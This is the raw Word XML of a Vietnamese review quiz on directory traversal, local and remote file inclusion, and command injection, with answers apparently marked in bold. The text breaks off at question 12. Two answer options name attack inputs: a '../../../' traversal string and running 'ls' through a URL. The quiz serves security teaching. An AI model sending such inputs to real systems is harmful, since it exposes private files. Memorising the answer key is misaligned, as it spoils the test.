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6116D" w14:textId="77777777" w:rsidR="00310518" w:rsidRPr="00310518" w:rsidRDefault="00310518" w:rsidP="00310518">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00310518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ÔN TẬP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC75CA9" w14:textId="5E49FFAD" w:rsidR="00310518" w:rsidRDefault="00310518" w:rsidP="00310518">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00310518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">TUẦN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="00310518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> – RLFI, Command Inclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B4EC5B5" w14:textId="32CB967F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 xml:space="preserve">Câu 1: </w:t>
      </w:r>
      <w:r w:rsidRPr="006F6CC2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Directory Traversal là gì?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61CE20BA" w14:textId="492E7DBA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a.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Khi kẻ tấn công duyệt qua các thư mục để truy cập các file không được phép</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E1C9412" w14:textId="0FED3EE5" w:rsidR="006F6CC2" w:rsidRPr="006F6CC2" w:rsidRDefault="006F6CC2" w:rsidP="006F6CC2">
      <w:r w:rsidRPr="006F6CC2">
        <w:t>b.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006F6CC2">
        <w:t>Khi server tải file lên từ một nguồn bên ngoài</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C81B9C5" w14:textId="632E8DA4" w:rsidR="006F6CC2" w:rsidRPr="006F6CC2" w:rsidRDefault="006F6CC2" w:rsidP="006F6CC2">
      <w:r w:rsidRPr="006F6CC2">
        <w:t>c.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006F6CC2">
        <w:t>Khi file hệ thống bị xóa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D41A28B" w14:textId="7840F4C1" w:rsidR="006F6CC2" w:rsidRDefault="006F6CC2" w:rsidP="006F6CC2">
      <w:r w:rsidRPr="006F6CC2">
        <w:t>d.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006F6CC2">
        <w:t>Khi file hệ thống được mã hóa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AED02DE" w14:textId="77777777" w:rsidR="006F6CC2" w:rsidRDefault="006F6CC2" w:rsidP="006F6CC2"/>
    <w:p w14:paraId="4B8A4048" w14:textId="77777777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 xml:space="preserve">Câu 2: </w:t>
      </w:r>
      <w:r w:rsidRPr="006F6CC2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Local File Inclusion (LFI) là gì?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B3D6DE2" w14:textId="3C7AFEA7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a.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LFI xảy ra khi file nằm trên cùng một web server và được kẻ tấn công truy cập</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17779CB6" w14:textId="601DDEB8" w:rsidR="006F6CC2" w:rsidRPr="006F6CC2" w:rsidRDefault="006F6CC2" w:rsidP="006F6CC2">
      <w:r w:rsidRPr="006F6CC2">
        <w:t>b.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006F6CC2">
        <w:t>LFI xảy ra khi file được tải lên từ bên ngoài web server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0977AA15" w14:textId="237EC3FA" w:rsidR="006F6CC2" w:rsidRPr="006F6CC2" w:rsidRDefault="006F6CC2" w:rsidP="006F6CC2">
      <w:r w:rsidRPr="006F6CC2">
        <w:t>c.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006F6CC2">
        <w:t>LFI là lỗi mã hóa file trên web server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64FB4973" w14:textId="60678E24" w:rsidR="006F6CC2" w:rsidRPr="006F6CC2" w:rsidRDefault="006F6CC2" w:rsidP="006F6CC2">
      <w:r w:rsidRPr="006F6CC2">
        <w:t>d.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006F6CC2">
        <w:t>LFI là file cấu hình của hệ thống</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E04A66" w14:textId="173D9C91" w:rsidR="006F6CC2" w:rsidRDefault="006F6CC2" w:rsidP="006F6CC2"/>
    <w:p w14:paraId="09A60413" w14:textId="77777777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 xml:space="preserve">Câu 3: </w:t>
      </w:r>
      <w:r w:rsidRPr="006F6CC2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Remote File Inclusion (RFI) là gì?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278F08B0" w14:textId="4053A893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a.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RFI là khi file nằm bên ngoài web server và có thể chứa mã độc thực thi từ xa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6791E971" w14:textId="3F1E555F" w:rsidR="006F6CC2" w:rsidRPr="006F6CC2" w:rsidRDefault="006F6CC2" w:rsidP="006F6CC2">
      <w:r w:rsidRPr="006F6CC2">
        <w:t>b.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006F6CC2">
        <w:t>RFI là khi file được lưu trữ tạm thời trên server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C94D05" w14:textId="56515A2E" w:rsidR="006F6CC2" w:rsidRPr="006F6CC2" w:rsidRDefault="006F6CC2" w:rsidP="006F6CC2">
      <w:r w:rsidRPr="006F6CC2">
        <w:t>c.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006F6CC2">
        <w:t>RFI là lỗi trong quá trình tải file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51CC9085" w14:textId="5A8EA5FF" w:rsidR="006F6CC2" w:rsidRPr="006F6CC2" w:rsidRDefault="006F6CC2" w:rsidP="006F6CC2">
      <w:r w:rsidRPr="006F6CC2">
        <w:t>d.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006F6CC2">
        <w:t>RFI là lỗi trong file cấu hình hệ thống</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D908386" w14:textId="2FD11456" w:rsidR="006F6CC2" w:rsidRDefault="006F6CC2" w:rsidP="006F6CC2"/>
    <w:p w14:paraId="0340A9E3" w14:textId="77777777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 xml:space="preserve">Câu 4: </w:t>
      </w:r>
      <w:r w:rsidRPr="006F6CC2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Một ví dụ về tấn công Directory Traversal là gì?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4575C0D1" w14:textId="191E117E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a.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Điều khiển truy cập vào một tệp tin ngoài thư mục gốc web</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF170B9" w14:textId="3EE46DC9" w:rsidR="006F6CC2" w:rsidRPr="006F6CC2" w:rsidRDefault="006F6CC2" w:rsidP="006F6CC2">
      <w:r w:rsidRPr="006F6CC2">
        <w:t>b.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006F6CC2">
        <w:t>Thay đổi quyền truy cập của người dùng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="727162EC" w14:textId="337DB5D2" w:rsidR="006F6CC2" w:rsidRPr="006F6CC2" w:rsidRDefault="006F6CC2" w:rsidP="006F6CC2">
      <w:r w:rsidRPr="006F6CC2">
        <w:t>c.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006F6CC2">
        <w:t>Xóa một tập tin quan trọng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57AB8709" w14:textId="51E5D61D" w:rsidR="006F6CC2" w:rsidRPr="006F6CC2" w:rsidRDefault="006F6CC2" w:rsidP="006F6CC2">
      <w:r w:rsidRPr="006F6CC2">
        <w:t>d.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006F6CC2">
        <w:t>Gửi thông tin qua kết nối bảo mật</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A2018B" w14:textId="6A685ACE" w:rsidR="006F6CC2" w:rsidRDefault="006F6CC2" w:rsidP="006F6CC2"/>
    <w:p w14:paraId="2B951B21" w14:textId="77777777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 xml:space="preserve">Câu 5: </w:t>
      </w:r>
      <w:r w:rsidRPr="006F6CC2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>LFI có thể được khai thác để thực hiện hành vi gì?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06063086" w14:textId="24B7DEDC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a.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Đọc nội dung của các file nhạy cảm trên hệ thống</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="707B6240" w14:textId="78DF7623" w:rsidR="006F6CC2" w:rsidRPr="006F6CC2" w:rsidRDefault="006F6CC2" w:rsidP="006F6CC2">
      <w:r w:rsidRPr="006F6CC2">
        <w:t>b.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006F6CC2">
        <w:t>Chặn các yêu cầu HTTP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="533BFDC8" w14:textId="0E041E3F" w:rsidR="006F6CC2" w:rsidRPr="006F6CC2" w:rsidRDefault="006F6CC2" w:rsidP="006F6CC2">
      <w:r w:rsidRPr="006F6CC2">
        <w:t>c.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006F6CC2">
        <w:t>Tạo file mới trên hệ thống</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F23C1A0" w14:textId="351BA3E2" w:rsidR="006F6CC2" w:rsidRPr="006F6CC2" w:rsidRDefault="006F6CC2" w:rsidP="006F6CC2">
      <w:r w:rsidRPr="006F6CC2">
        <w:t>d.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006F6CC2">
        <w:t>Xóa file khỏi hệ thống</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="216BDB95" w14:textId="03C5F7A9" w:rsidR="006F6CC2" w:rsidRDefault="006F6CC2" w:rsidP="006F6CC2">
      <w:pPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="670D0215" w14:textId="77777777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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Câu 6: </w:t>
      </w:r>
      <w:r w:rsidRPr="006F6CC2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Biện pháp nào sau đây là cần thiết để ngăn chặn lỗ hổng Directory Traversal?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7915CDB2" w14:textId="77777777" w:rsidR="006F6CC2" w:rsidRPr="006F6CC2" w:rsidRDefault="006F6CC2" w:rsidP="006F6CC2">
      <w:r w:rsidRPr="006F6CC2">
        <w:t>Câu hỏi 6Chọn câu trả lời chính xác nhất:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="789C7292" w14:textId="0925571A" w:rsidR="006F6CC2" w:rsidRPr="006F6CC2" w:rsidRDefault="006F6CC2" w:rsidP="006F6CC2">
      <w:r w:rsidRPr="006F6CC2">
        <w:t>a.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006F6CC2">
        <w:t>Tạo đường dẫn tĩnh cho tất cả các tệp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61532772" w14:textId="15E5913C" w:rsidR="006F6CC2" w:rsidRPr="006F6CC2" w:rsidRDefault="006F6CC2" w:rsidP="006F6CC2">
      <w:r w:rsidRPr="006F6CC2">
        <w:t>b.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006F6CC2">
        <w:t>Chỉ sử dụng GET request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D6B2273" w14:textId="04CBCCC1" w:rsidR="006F6CC2" w:rsidRPr="006F6CC2" w:rsidRDefault="006F6CC2" w:rsidP="006F6CC2">
      <w:r w:rsidRPr="006F6CC2">
        <w:t>c.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006F6CC2">
        <w:t>Mã hóa tệp tin trước khi truy cập</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B25B50C" w14:textId="3BEB04ED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d.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Giới hạn quyền truy cập tệp trên máy chủ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BCA8E5A" w14:textId="609F5271" w:rsidR="006F6CC2" w:rsidRPr="006F6CC2" w:rsidRDefault="006F6CC2" w:rsidP="006F6CC2"/>
    <w:p w14:paraId="2CD4A840" w14:textId="77777777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 xml:space="preserve">Câu 7: </w:t>
      </w:r>
      <w:r w:rsidRPr="006F6CC2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Code Injection có thể dẫn đến điều gì?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57AA0052" w14:textId="0FB57203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a.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Chạy lệnh của hệ điều hành trên máy chủ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="091D192F" w14:textId="3D1C461B" w:rsidR="006F6CC2" w:rsidRPr="006F6CC2" w:rsidRDefault="006F6CC2" w:rsidP="006F6CC2">
      <w:r w:rsidRPr="006F6CC2">
        <w:t>b.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006F6CC2">
        <w:t>Chặn kết nối mạng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A95F0F9" w14:textId="04593950" w:rsidR="006F6CC2" w:rsidRPr="006F6CC2" w:rsidRDefault="006F6CC2" w:rsidP="006F6CC2">
      <w:r w:rsidRPr="006F6CC2">
        <w:t>c.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006F6CC2">
        <w:t>Xem tệp tin hệ thống</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E072359" w14:textId="6C7646A5" w:rsidR="006F6CC2" w:rsidRPr="006F6CC2" w:rsidRDefault="006F6CC2" w:rsidP="006F6CC2">
      <w:r w:rsidRPr="006F6CC2">
        <w:t>d.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006F6CC2">
        <w:t>Gửi email hàng loạt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4494F4B5" w14:textId="77777777" w:rsidR="006F6CC2" w:rsidRDefault="006F6CC2" w:rsidP="006F6CC2"/>
    <w:p w14:paraId="0D8F9247" w14:textId="10811F28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Câu 8:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F6CC2">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:noProof w:val="0"/>
          <w:color w:val="001A1E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006F6CC2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>File inclusion có thể gây ra hậu quả gì đối với hệ thống?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74557B4C" w14:textId="450FBDE2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a.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Kẻ tấn công có thể truy cập trái phép vào các file hệ thống nhạy cảm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D1D0E1" w14:textId="4340C5DB" w:rsidR="006F6CC2" w:rsidRPr="006F6CC2" w:rsidRDefault="006F6CC2" w:rsidP="006F6CC2">
      <w:r w:rsidRPr="006F6CC2">
        <w:t>b.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006F6CC2">
        <w:t>Hệ thống sẽ ghi lại toàn bộ dữ liệu đầu vào</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="288F548D" w14:textId="5B2794D2" w:rsidR="006F6CC2" w:rsidRPr="006F6CC2" w:rsidRDefault="006F6CC2" w:rsidP="006F6CC2">
      <w:r w:rsidRPr="006F6CC2">
        <w:t>c.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006F6CC2">
        <w:t>Hệ thống sẽ tự động mã hóa tất cả các file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F79FDC" w14:textId="48B0F37E" w:rsidR="006F6CC2" w:rsidRPr="006F6CC2" w:rsidRDefault="006F6CC2" w:rsidP="006F6CC2">
      <w:r w:rsidRPr="006F6CC2">
        <w:t>d.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006F6CC2">
        <w:t>Hệ thống sẽ chỉ cho phép tải các file từ mạng nội bộ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F3668F" w14:textId="5DBC9608" w:rsidR="00284649" w:rsidRDefault="00284649"/>
    <w:p w14:paraId="517AFA20" w14:textId="77777777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 xml:space="preserve">Câu 9: </w:t>
      </w:r>
      <w:r w:rsidRPr="006F6CC2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Một ví dụ về tấn công Command Injection là gì?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36AD5AC0" w14:textId="7229DFC6" w:rsidR="006F6CC2" w:rsidRPr="006F6CC2" w:rsidRDefault="006F6CC2" w:rsidP="006F6CC2">
      <w:r w:rsidRPr="006F6CC2">
        <w:t>a.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006F6CC2">
        <w:t>Gửi tệp đính kèm có mã độc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="323F6F82" w14:textId="28D3283B" w:rsidR="006F6CC2" w:rsidRPr="006F6CC2" w:rsidRDefault="006F6CC2" w:rsidP="006F6CC2">
      <w:r w:rsidRPr="006F6CC2">
        <w:t>b.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006F6CC2">
        <w:t>Đánh cắp cookie của người dùng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B449052" w14:textId="001525B5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>c.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Chạy lệnh `ls` để liệt kê tệp trên máy chủ qua URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69946B82" w14:textId="69C8CD12" w:rsidR="006F6CC2" w:rsidRPr="006F6CC2" w:rsidRDefault="006F6CC2" w:rsidP="006F6CC2">
      <w:r w:rsidRPr="006F6CC2">
        <w:t>d.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006F6CC2">
        <w:t>Sử dụng cổng không bảo mật</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F23FCBD" w14:textId="7DED36C2" w:rsidR="006F6CC2" w:rsidRDefault="006F6CC2"/>
    <w:p w14:paraId="627808E9" w14:textId="77777777" w:rsidR="006F6CC2" w:rsidRPr="006F6CC2" w:rsidRDefault="006F6CC2" w:rsidP="006F6CC2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F6CC2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Câu 10: </w:t>
      </w:r>
      <w:r w:rsidRPr="006F6CC2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Để kiểm tra Directory Traversal, người kiểm thử có thể làm gì?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="768F2B74" w14:textId="74EE2D0F" w:rsidR="006F6CC2" w:rsidRPr="006F6CC2" w:rsidRDefault="006F6CC2" w:rsidP="006F6CC2">
      <w:r w:rsidRPr="006F6CC2">
        <w:t>a.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006F6CC2">
        <w:t>Thực hiện tấn công SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D80CC1" w14:textId="1DFE7E35" w:rsidR="006F6CC2" w:rsidRPr="006F6CC2" w:rsidRDefault="006F6CC2" w:rsidP="006F6CC2">
      <w:r w:rsidRPr="006F6CC2">
        <w:t>b.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006F6CC2">
        <w:t>Đọc cookie của người dùng khác</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="667AC3E5" w14:textId="7BACBC68" w:rsidR="006F6CC2" w:rsidRPr="006F6CC2" w:rsidRDefault="006F6CC2" w:rsidP="006F6CC2">
      <w:r w:rsidRPr="006F6CC2">
        <w:t>c.</w:t>
      </w:r>
      <w:r w:rsidRPr="006F6CC2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006F6CC2">
        <w:t>Gửi email mã độc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1228F05B" w14:textId="750B52A8" w:rsidR="006F6CC2" w:rsidRDefault="006F6CC2" w:rsidP="006F6CC2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F6CC2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>d.</w:t>
      </w:r>
      <w:r w:rsidRPr="006F6CC2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006F6CC2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Gửi yêu cầu chứa chuỗi `../../../`</w:t>
      </w:r>
      <w:r w:rsidR="00DA21E1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="550FDC47" w14:textId="77777777" w:rsidR="00DA21E1" w:rsidRDefault="00DA21E1" w:rsidP="006F6CC2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="329623E9" w14:textId="77777777" w:rsidR="00DA21E1" w:rsidRPr="00DA21E1" w:rsidRDefault="00DA21E1" w:rsidP="00DA21E1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA21E1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Câu 11: </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA21E1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Directory Traversal thường được sử dụng để thực hiện điều gì?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C4A406D" w14:textId="69006257" w:rsidR="00DA21E1" w:rsidRPr="00DA21E1" w:rsidRDefault="00DA21E1" w:rsidP="00DA21E1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA21E1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>a.</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA21E1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA21E1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Truy cập vào các file không được phép nằm ngoài thư mục gốc của ứng dụng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C39072A" w14:textId="275C1C5B" w:rsidR="00DA21E1" w:rsidRPr="00DA21E1" w:rsidRDefault="00DA21E1" w:rsidP="00DA21E1">
      <w:r w:rsidRPr="00DA21E1">
        <w:t>b.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA21E1">
        <w:t>Tải file lên server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A3CDE4D" w14:textId="2E510FEF" w:rsidR="00DA21E1" w:rsidRPr="00DA21E1" w:rsidRDefault="00DA21E1" w:rsidP="00DA21E1">
      <w:r w:rsidRPr="00DA21E1">
        <w:t>c.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA21E1">
        <w:t>Mã hóa toàn bộ các file trên server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D95604B" w14:textId="54F0BC08" w:rsidR="00DA21E1" w:rsidRDefault="00DA21E1" w:rsidP="00DA21E1">
      <w:r w:rsidRPr="00DA21E1">
        <w:t>d.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA21E1">
        <w:t>Thực thi các lệnh hệ thống từ xa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="036C266D" w14:textId="77777777" w:rsidR="00DA21E1" w:rsidRPr="00DA21E1" w:rsidRDefault="00DA21E1" w:rsidP="00DA21E1">
      <w:pPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA21E1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Câu 12: </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA21E1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>RFI có thể dẫn đến điều gì trên hệ thống bị tấn công?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34311019" w14:textId="65CC9B30" w:rsidR="00DA21E1" w:rsidRPr="00DA21E1" w:rsidRDefault="00DA21E1" w:rsidP="00DA21E1">
      <w:pPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA21E1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>a.</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA21E1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA21E1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Kẻ tấn công có thể thực thi mã từ xa để điều khiển hệ thống</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="086AEAF0" w14:textId="0F1884CF" w:rsidR="00DA21E1" w:rsidRPr="00DA21E1" w:rsidRDefault="00DA21E1" w:rsidP="00DA21E1">
      <w:pPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00DA21E1">
        <w:t>b.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA21E1">
        <w:t>Chỉ cho phép tải lên file từ máy cục bộ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F75997" w14:textId="68372D11" w:rsidR="00DA21E1" w:rsidRPr="00DA21E1" w:rsidRDefault="00DA21E1" w:rsidP="00DA21E1">
      <w:pPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00DA21E1">
        <w:t>c.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
